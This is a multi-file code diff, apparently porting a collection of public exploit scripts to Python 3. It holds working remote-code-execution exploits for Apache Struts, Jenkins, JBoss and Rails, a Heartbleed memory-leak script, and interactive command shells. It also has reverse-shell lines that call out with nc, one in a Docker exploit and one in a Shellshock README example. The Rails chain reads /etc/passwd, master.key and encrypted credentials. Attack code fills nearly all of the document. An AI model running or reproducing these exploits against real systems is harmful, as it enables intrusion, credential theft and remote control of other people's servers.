+                                print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC)
-							else:
+                            else:
-								print BOLD+RED+"\nNo Create File :/\n"+ENDC
+                                print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
-		# CVE-2017-5638 ---------------------------------------------------------------------------------					
+        # CVE-2017-5638 ---------------------------------------------------------------------------------
-		print BLUE+"     [-] NO VULNERABLE"+ENDC			
+        print(BLUE+"     [-] NO VULNERABLE"+ENDC)
-		print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC
+        print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
-		x = 0
+        x = 0
-		while x < len(validador()):
+        while x < len(validador()):
-			valida = validador()[x]
+            valida = validador()[x]
-			try:
+            try:
-				req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
+                req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
-				result = urllib2.urlopen(req).read()
+                result = urllib.request.urlopen(req).read()
-			  	if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
+                if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
-			  		print RED+"   [-] VULNERABLE"+ENDC
+                    print(RED+"   [-] VULNERABLE"+ENDC)
-			  		owned = open('vulnsite.txt', 'a')
+                    owned = open('vulnsite.txt', 'a')
-					owned.write(str(host)+'\n')
+                    owned.write(str(host)+'\n')
-					owned.close()
+                    owned.close()
-					opcion = raw_input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
+                    opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
-					if opcion == 's':
+                    if opcion == 's':
-						print YELLOW+"   [-] GET PROMPT...\n"+ENDC
+                        print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
-						time.sleep(1)
+                        time.sleep(1)
-					  	while 1:
+                        while 1:
-							try:
+                            try:
-								separador = raw_input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
+                                separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
-								req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
+                                req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
-								result = urllib2.urlopen(req).read()
+                                result = urllib.request.urlopen(req).read()
-								print "\n"+result
+                                print("\n"+result)
-							except:
+                            except:
-								exit(0)
+                                exit(0)
-					else:
+                    else:
-						x = len(validador())
+                        x = len(validador())
-				else:
+                else:
-					print BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)
+                    print(BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
-			except:
+            except:
-				pass
+                pass
-			x=x+1
+            x=x+1
-		# CVE-2018-11776 ---------------------------------------------------------------------------------
+        # CVE-2018-11776 ---------------------------------------------------------------------------------
-		print BLUE+"     [-] NO VULNERABLE"+ENDC			
+        print(BLUE+"     [-] NO VULNERABLE"+ENDC)
-		print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC
+        print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
-		x = 0
+        x = 0
-		while x < len(validador()):
+        while x < len(validador()):
-			#Filtramos la url solo dominio
+            #Filtramos la url solo dominio
-			url = host.replace('#', '%23')
+            url = host.replace('#', '%23')
-			url = host.replace(' ', '%20')
+            url = host.replace(' ', '%20')
-			if ('://' not in url):
+            if ('://' not in url):
-				url = str("http://") + str(url)
+                url = str("http://") + str(url)
-			scheme = urlparse.urlparse(url).scheme
+            scheme = urllib.parse.urlparse(url).scheme
-			site = scheme + '://' + urlparse.urlparse(url).netloc
+            site = scheme + '://' + urllib.parse.urlparse(url).netloc
-			#Filtramos la url solo path
+            #Filtramos la url solo path
-			file_path = urlparse.urlparse(url).path
+            file_path = urllib.parse.urlparse(url).path
-			if (file_path == ''):
+            if (file_path == ''):
-				file_path = '/'
+                file_path = '/'
-			valida = validador()[x]
+            valida = validador()[x]
-			try:	
+            try:
-				result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
+                result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
-				if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
+                if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
-			  		print RED+"   [-] VULNERABLE"+ENDC
+                    print(RED+"   [-] VULNERABLE"+ENDC)
-			  		owned = open('vulnsite.txt', 'a')
+                    owned = open('vulnsite.txt', 'a')
-					owned.write(str(host)+'\n')
+                    owned.write(str(host)+'\n')
-					owned.close()
+                    owned.close()
-					opcion = raw_input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
+                    opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
-					if opcion == 's':
+                    if opcion == 's':
-						print YELLOW+"   [-] GET PROMPT...\n"+ENDC
+                        print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
-						time.sleep(1)
+                        time.sleep(1)
-						print BOLD+"   * [UPLOAD SHELL]"+ENDC
+                        print(BOLD+"   * [UPLOAD SHELL]"+ENDC)
-						print OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC
+                        print(OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC)
-					  	while 1:
+                        while 1:
-							separador = raw_input(GREEN+"Struts2@Shell_3:$ "+ENDC)
+                            separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
-							espacio = separador.split(' ')
+                            espacio = separador.split(' ')
-							comando = "%20".join(espacio)
+                            comando = "%20".join(espacio)
-							shell = urllib2.urlopen(host+exploit3(str(comando)))
+                            shell = urllib.request.urlopen(host+exploit3(str(comando)))
-							print "\n"+shell.read()
+                            print("\n"+shell.read())
-					else:
+                    else:
-						x = len(validador())
+                        x = len(validador())
-						exit(0)
+                        exit(0)
-				else:
+                else:
-					print BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)
+                    print(BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
-			except:
+            except:
-				pass
+                pass
-			x=x+1
+            x=x+1
-	else:
+    else:
-		print RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC
+        print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
-		exit(0)
+        exit(0)
 else:
-	print RED+" Debe Ingresar una Url\n"+ENDC
+    print(RED+" Debe Ingresar una Url\n"+ENDC)
-	exit(0)
+    exit(0)
--- a/CVE-2017-5638.py
+++ b/CVE-2017-5638.py
@@ -1,176 +0,0 @@
 #!/usr/bin/env python3
 # coding=utf-8
 # *****************************************************
 # struts-pwn: Apache Struts CVE-2017-5638 Exploit
 # Author:
 # Mazin Ahmed <Mazin AT MazinAhmed DOT net>
 # This code is based on:
 # https://www.exploit-db.com/exploits/41570/
 # https://www.seebug.org/vuldb/ssvid-92746
 # *****************************************************
 import sys
 import random
 import requests
 import argparse
 # Disable SSL warnings
 try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
 except:
    pass
 if len(sys.argv) <= 1:
    print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
    print('[*] Struts-PWN - @mazen160')
    print('\n%s -h for help.' % (sys.argv[0]))
    exit(0)
 parser = argparse.ArgumentParser()
 parser.add_argument("-u", "--url",
                    dest="url",
                    help="Check a single URL.",
                    action='store')
 parser.add_argument("-l", "--list",
                    dest="usedlist",
                    help="Check a list of URLs.",
                    action='store')
 parser.add_argument("-c", "--cmd",
                    dest="cmd",
                    help="Command to execute. (Default: id)",
                    action='store',
                    default='id')
 parser.add_argument("--check",
                    dest="do_check",
                    help="Check if a target is vulnerable.",
                    action='store_true')
 args = parser.parse_args()
 url = args.url if args.url else None
 usedlist = args.usedlist if args.usedlist else None
 url = args.url if args.url else None
 cmd = args.cmd if args.cmd else None
 do_check = args.do_check if args.do_check else None
 def url_prepare(url):
    url = url.replace('#', '%23')
    url = url.replace(' ', '%20')
    if ('://' not in url):
        url = str('http') + str('://') + str(url)
    return(url)
 def exploit(url, cmd):
    url = url_prepare(url)
    print('\n[*] URL: %s' % (url))
    print('[*] CMD: %s' % (cmd))
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    headers = {
        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
        'Content-Type': str(payload),
        'Accept': '*/*'
    }
    timeout = 3
    try:
        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        output = 'ERROR'
    return(output)
 def check(url):
    url = url_prepare(url)
    print('\n[*] URL: %s' % (url))
    random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7))
    payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
    payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string)
    headers = {
        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
        'Content-Type': str(payload),
        'Accept': '*/*'
    }
    timeout = 3
    try:
        resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
        if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
            result = True
        else:
            result = False
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        result = False
    return(result)
 def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
    if url:
        if do_check:
            result = check(url)  # Only check for existence of Vulnerablity
            output = '[*] Status: '
            if result is True:
                output += 'Vulnerable!'
            else:
                output += 'Not Affected.'
        else:
            output = exploit(url, cmd)  # Exploit
        print(output)
    if usedlist:
        URLs_List = []
        try:
            f_file = open(str(usedlist), 'r')
            URLs_List = f_file.read().replace('\r', '').split('\n')
            try:
                URLs_List.remove('')
            except ValueError:
                pass
                f_file.close()
        except:
            print('Error: There was an error in reading list file.')
            exit(1)
        for url in URLs_List:
            if do_check:
                result = check(url)  # Only check for existence of Vulnerablity
                output = '[*] Status: '
                if result is True:
                    output += 'Vulnerable!'
                else:
                    output += 'Not Affected.'
            else:
                output = exploit(url, cmd)  # Exploit
            print(output)
    print('[%] Done.')
 if __name__ == '__main__':
    try:
        main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
    except KeyboardInterrupt:
        print('\nKeyboardInterrupt Detected.')
        print('Exiting...')
        exit(0)
--- a/CVE-2017-9805.py
+++ b/CVE-2017-9805.py
@@ -8,6 +8,8 @@
 # https://github.com/rapid7/metasploit-framework/pull/8924
 # https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
 # *****************************************************
 from __future__ import print_function
 from builtins import str
 import argparse
 import requests
 import sys
--- a/CVE-2018-11776.py
+++ b/CVE-2018-11776.py
@@ -8,6 +8,11 @@
 # https://github.com/jas502n/St2-057
 # *****************************************************
 from __future__ import print_function
 from future import standard_library
 standard_library.install_aliases()
 from builtins import str
 from builtins import range
 import argparse
 import random
 import requests
@@ -15,7 +20,7 @@ import sys
 try:
    from urllib import parse as urlparse
 except ImportError:
-    import urlparse
+    import urllib.parse
 # Disable SSL warnings
 try:
@@ -77,13 +82,13 @@ def parse_url(url):
    if ('://' not in url):
        url = str("http://") + str(url)
-    scheme = urlparse.urlparse(url).scheme
+    scheme = urllib.parse.urlparse(url).scheme
    # Site: http://example.com
-    site = scheme + '://' + urlparse.urlparse(url).netloc
+    site = scheme + '://' + urllib.parse.urlparse(url).netloc
    # FilePath: /demo/struts2-showcase/index.action
-    file_path = urlparse.urlparse(url).path
+    file_path = urllib.parse.urlparse(url).path
    if (file_path == ''):
        file_path = '/'
@@ -154,7 +159,7 @@ def check(url):
        except Exception as e:
            print("EXCEPTION::::--> " + str(e))
            continue
-        if "Location" in resp.headers.keys():
+        if "Location" in list(resp.headers.keys()):
            if str(multiplication_value) in resp.headers['Location']:
                print("[*] Status: Vulnerable!")
                return(injection_point)
--- a/Exploits/Docker
+++ b/Exploits/Docker
@@ -1,3 +1,4 @@
 from __future__ import print_function
 import requests
 import logging
 import json
@@ -23,7 +24,7 @@ if r.json:
    for container in r.json():
        container_id   = container['Id']
        container_name = container['Names'][0].replace('/','')
-        print(container_id, container_name)
+        print((container_id, container_name))
        # Step 2 - Prepare command
        cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
--- a/Exploits/Drupalgeddon2
+++ b/Exploits/Drupalgeddon2
--- a/Exploits/Heartbleed
+++ b/Exploits/Heartbleed
@@ -4,6 +4,9 @@
 # The author disclaims copyright to this source code.
 # Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
 from __future__ import print_function
 from builtins import str
 from builtins import range
 import sys
 import struct
 import socket
@@ -61,12 +64,12 @@ def hexdump(s, dumpf, quiet):
 	dump.write(s)
 	dump.close()
 	if quiet: return
-	for b in xrange(0, len(s), 16):
+	for b in range(0, len(s), 16):
 		lin = [c for c in s[b : b + 16]]
 		hxdat = ' '.join('%02X' % ord(c) for c in lin)
 		pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
-		print '  %04x: %-48s %s' % (b, hxdat, pdat)
+		print('  %04x: %-48s %s' % (b, hxdat, pdat))
-	print
+	print()
 def recvall(s, length, timeout=5):
 	endtime = time.time() + timeout
@@ -92,57 +95,57 @@ def recvall(s, length, timeout=5):
 def recvmsg(s):
 	hdr = recvall(s, 5)
 	if hdr is None:
-		print 'Unexpected EOF receiving record header - server closed connection'
+		print('Unexpected EOF receiving record header - server closed connection')
 		return None, None, None
 	typ, ver, ln = struct.unpack('>BHH', hdr)
 	pay = recvall(s, ln, 10)
 	if pay is None:
-		print 'Unexpected EOF receiving record payload - server closed connection'
+		print('Unexpected EOF receiving record payload - server closed connection')
 		return None, None, None
-	print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
+	print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
 	return typ, ver, pay
 def hit_hb(s, dumpf, host, quiet):
 	while True:
 		typ, ver, pay = recvmsg(s)
 		if typ is None:
-			print 'No heartbeat response received from '+host+', server likely not vulnerable'
+			print('No heartbeat response received from '+host+', server likely not vulnerable')
 			return False
 		if typ == 24:
-			if not quiet: print 'Received heartbeat response:'
+			if not quiet: print('Received heartbeat response:')
 			hexdump(pay, dumpf, quiet)
 			if len(pay) > 3:
-				print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!'
+				print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!')
 			else:
-				print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.'
+				print('Server '+host+' processed malformed heartbeat, but did not return any extra data.')
 			return True
 		if typ == 21:
-			if not quiet: print 'Received alert:'
+			if not quiet: print('Received alert:')
 			hexdump(pay, dumpf, quiet)
-			print 'Server '+ host +' returned error, likely not vulnerable'
+			print('Server '+ host +' returned error, likely not vulnerable')
 			return False
 def connect(host, port, quiet):
 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-	if not quiet: print 'Connecting...'
+	if not quiet: print('Connecting...')
 	sys.stdout.flush()
 	s.connect((host, port))
 	return s
 def tls(s, quiet):
-	if not quiet: print 'Sending Client Hello...'
+	if not quiet: print('Sending Client Hello...')
 	sys.stdout.flush()
 	s.send(hello)
-	if not quiet: print 'Waiting for Server Hello...'
+	if not quiet: print('Waiting for Server Hello...')
 	sys.stdout.flush()
 def parseresp(s):
 	while True:
 		typ, ver, pay = recvmsg(s)
 		if typ == None:
-			print 'Server closed connection without sending Server Hello.'
+			print('Server closed connection without sending Server Hello.')
 			return 0
 		# Look for server hello done message.
 		if typ == 22 and ord(pay[0]) == 0x0E:
@@ -156,10 +159,10 @@ def check(host, port, dumpf, quiet, starttls):
 			s.ehlo()
 			s.starttls()
 		except smtplib.SMTPException:
-			print 'STARTTLS not supported...'
+			print('STARTTLS not supported...')
 			s.quit()
 			return False
-		print 'STARTTLS supported...'
+		print('STARTTLS supported...')
 		s.quit()
 		s = connect(host, port, quiet)
 		s.settimeout(1)
@@ -170,7 +173,7 @@ def check(host, port, dumpf, quiet, starttls):
 			s.send('starttls\r\n')
 			re = s.recv(1024)
 		except socket.timeout:
-			print 'Timeout issues, going ahead anyway, but it is probably broken ...'
+			print('Timeout issues, going ahead anyway, but it is probably broken ...')
 		tls(s,quiet)
 	else:
 		s = connect(host, port, quiet)
@@ -179,13 +182,13 @@ def check(host, port, dumpf, quiet, starttls):
 	version = parseresp(s)
 	if version == 0:
-		if not quiet: print "Got an error while parsing the response, bailing ..."
+		if not quiet: print("Got an error while parsing the response, bailing ...")
 		return False
 	else:
 		version = version - 0x0300
-		if not quiet: print "Server TLS version was 1.%d\n" % version
+		if not quiet: print("Server TLS version was 1.%d\n" % version)
-	if not quiet: print 'Sending heartbeat request...'
+	if not quiet: print('Sending heartbeat request...')
 	sys.stdout.flush()
 	if (version == 1):
 		s.send(hbv10)
@@ -205,8 +208,8 @@ def main():
 		options.print_help()
 		return
-	print 'Scanning ' + args[0] + ' on port ' + str(opts.port)
+	print('Scanning ' + args[0] + ' on port ' + str(opts.port))
-	for i in xrange(0,opts.num):
+	for i in range(0,opts.num):
 		check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
 if __name__ == '__main__':
--- a/CVE-2015-7501.py
+++ b/CVE-2015-7501.py
@@ -3,6 +3,7 @@
 # Jboss Java Deserialization RCE (CVE-2015-7501)
 # Made with <3 by @byt3bl33d3r
 from __future__ import print_function
 import requests
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@@ -36,26 +37,26 @@ else:
        ysoserial_path = args.ysoserial_path
 if ysoserial_path is None:
-    print '[-] Could not find ysoserial JAR file'
+    print('[-] Could not find ysoserial JAR file')
    sys.exit(1)
 if len(args.target.split(":")) != 2:
-    print '[-] Target must be in format IP:PORT'
+    print('[-] Target must be in format IP:PORT')
    sys.exit(1)
 if not args.command:
-    print '[-] You must specify a command to run'
+    print('[-] You must specify a command to run')
    sys.exit(1)
 ip, port = args.target.split(':')
-print '[*] Target IP: {}'.format(ip)
+print('[*] Target IP: {}'.format(ip))
-print '[*] Target PORT: {}'.format(port)
+print('[*] Target PORT: {}'.format(port))
 gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
 r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
 if r.status_code == 200:
-    print '[+] Command executed successfully'
+    print('[+] Command executed successfully')
--- a/CVE-2015-8103.py
+++ b/CVE-2015-8103.py
--- a/CVE-2016-0792.py
+++ b/CVE-2016-0792.py
@@ -4,6 +4,7 @@
 #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
 #Made with <3 by @byt3bl33d3r
 from __future__ import print_function
 import requests
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@@ -23,17 +24,17 @@ if len(sys.argv) < 2:
 args = parser.parse_args()
 if len(args.target.split(':')) != 2:
-    print '[-] Target must be in format IP:PORT'
+    print('[-] Target must be in format IP:PORT')
    sys.exit(1)
 if not args.command:
-    print '[-] You must specify a command to run'
+    print('[-] You must specify a command to run')
    sys.exit(1)
 ip, port = args.target.split(':')
-print '[*] Target IP: {}'.format(ip)
+print('[*] Target IP: {}'.format(ip))
-print '[*] Target PORT: {}'.format(port)
+print('[*] Target PORT: {}'.format(port))
 xml_formatted = ''
 command_list = args.command.split()
@@ -67,11 +68,11 @@ xml_payload = '''<map>
 </entry>
 </map>'''.format(xml_formatted.strip())
-print '[*] Generated XML payload:'
+print('[*] Generated XML payload:')
-print xml_payload
+print(xml_payload)
-print 
+print() 
-print '[*] Sending payload'
+print('[*] Sending payload')
 headers = {'Content-Type': 'text/xml'}
 r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
@@ -79,5 +80,5 @@ paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
 if r.status_code == 500:
    for path in paths_in_trace:
        if path in r.text:
-            print '[+] Command executed successfully'
+            print('[+] Command executed successfully')
            break
--- a/Exploits/Jenkins
+++ b/Exploits/Jenkins
@@ -0,0 +1,32 @@
 #!/usr/bin/env python
 # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
 # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
 from __future__ import print_function
 from builtins import input
 import requests
 import sys
 print("""
 Jenkins Groovy Console cmd runner.
 usage: ./jgc.py [HOST]
 Then type any command and wait for STDOUT output from remote machine.
 Type 'exit' to exit :)
 """)
 URL = sys.argv[1] + '/scriptText'
 HEADERS = {
    'User-Agent': 'jgc'
 }
 while 1:
    CMD = input(">> Enter command to execute (or type 'exit' to exit): ")
    if CMD == 'exit':
        print("exiting...\n")
        exit(0)
    DATA = {
        'script': 'println "{}".execute().text'.format(CMD)
    }
    result = requests.post(URL, headers=HEADERS, data=DATA)
    print(result.text)
--- a/Exploits/README.md
+++ b/Exploits/README.md
@@ -1,16 +1,29 @@
 # Common Vulnerabilities and Exposures
 Big CVEs in the last 5 years.
 ## CVE-2014-0160 - Heartbleed
 The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
 ## CVE-2014-6271 - Shellshock
 Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
 ```bash
 echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
 ```
 ## CVE-2017-5638 - Apache Struts 2
 On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
 ## CVE-2018-7600 - Drupalgeddon 2
 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
 ## Thanks to
-* http://heartbleed.com
+
-* https://en.wikipedia.org/wiki/Shellshock_(software_bug)
+* [Heartbleed - Official website](http://heartbleed.com)
 * [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
 * [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
--- a/CVE-2019-5420.rb
+++ b/CVE-2019-5420.rb
@@ -0,0 +1,156 @@
 require 'erb'
 require "./demo-5.2.1/config/environment"
 require "base64"
 require 'net/http'
 $proxy_addr = '127.0.0.1'
 $proxy_port = 8080
 $remote = "http://172.18.0.3:3000"
 $ressource = "/demo"
 puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n"
 print "[+] Checking if vulnerable to CVE-2019-5418 => "
 uri = URI($remote + $ressource)
 req = Net::HTTP::Get.new(uri)
 req['Accept'] = "../../../../../../../../../../etc/passwd{{"
 res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
  http.request(req)
 }
 if res.body.include? "root:x:0:0:root:"
   puts "\033[92mOK\033[0m"
 else
    puts "KO"
    abort
 end
 print "[+] Getting file => credentials.yml.enc => "
 path = "../../../../../../../../../../config/credentials.yml.enc{{"
 for $i in 0..9
    uri = URI($remote + $ressource)
    req = Net::HTTP::Get.new(uri)
    req['Accept'] = path[3..57]
    res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
        http.request(req)
    }
    if res.code == "200"
        puts "\033[92mOK\033[0m"
        File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) }
        break
    end
    path = path[3..57]
    $i +=1;
 end
 print "[+] Getting file => master.key => "
 path = "../../../../../../../../../../config/master.key{{"
 for $i in 0..9
    uri = URI($remote + $ressource)
    req = Net::HTTP::Get.new(uri)
    req['Accept'] = path[3..57]
    res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
        http.request(req)
    }
    if res.code == "200"
        puts "\033[92mOK\033[0m"
        File.open("master.key", 'w') { |file| file.write(res.body) }
        break
    end
    path = path[3..57]
    $i +=1;
 end
 print "[+] Decrypt secret_key_base => "
 credentials_config_path = File.join("../", "credentials.yml.enc")
 credentials_key_path = File.join("../", "master.key")
 ENV["RAILS_MASTER_KEY"] = res.body
 credentials = ActiveSupport::EncryptedConfiguration.new(
    config_path: Rails.root.join(credentials_config_path),
    key_path: Rails.root.join(credentials_key_path),
    env_key: "RAILS_MASTER_KEY",
    raise_if_missing_key: true
 )
 if credentials.secret_key_base != nil
    puts "\033[92mOK\033[0m"
    puts ""
    puts "secret_key_base": credentials.secret_key_base
    puts ""
 end
 puts "[+] Getting reflective command (R) or reverse shell (S) => "
 loop do 
    begin
        input = [(print 'Select option R or S: '), gets.rstrip][1]
        if input == "R"
            puts "Reflective command selected"
            command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1]
        elsif input == "S"
            puts "Reverse shell selected"
            command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1]
        else
            puts "No option selected"
            abort
        end
        command_b64 = Base64.encode64(command)
        print "[+] Generating payload CVE-2019-5420 => "
        secret_key_base = credentials.secret_key_base
        key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
        secret = key_generator.generate_key("ActiveStorage")
        verifier = ActiveSupport::MessageVerifier.new(secret)
        if input == "R"
            code = "system('bash','-c','" + command + " > /tmp/result.txt')"
        else
            code = "system('bash','-c','" + command + "')"
        end 
        erb = ERB.allocate
        erb.instance_variable_set :@src, code
        erb.instance_variable_set :@filename, "1"
        erb.instance_variable_set :@lineno, 1
        dump_target  = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
        puts "\033[92mOK\033[0m"
        puts ""
        url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test"
        puts url
        puts ""
        print "[+] Sending request => "
        uri = URI(url)
        req = Net::HTTP::Get.new(uri)
        req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
        http.request(req)
        }
        if res.code == "500"
            puts "\033[92mOK\033[0m"
        else
            puts "KO"
            abort
        end
        if input == "R"
            print "[+] Getting result of command => "
            uri = URI($remote + $ressource)
            req = Net::HTTP::Get.new(uri)
            req['Accept'] = "../../../../../../../../../../tmp/result.txt{{"
            res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
            http.request(req)
            }
            if res.code == "200"
                puts "\033[92mOK\033[0m\n\n"
                puts res.body
                puts "\n"
            else
                puts "KO"
                abort
            end
        end
    rescue Exception => e
        puts "Exiting..."
        abort
    end
 end
--- a/Exploits/Shellshock
+++ b/Exploits/Shellshock
@@ -11,22 +11,26 @@
 # ..
 # ~$ /bin/cat /etc/passwd
-import sys, urllib2
+from __future__ import print_function
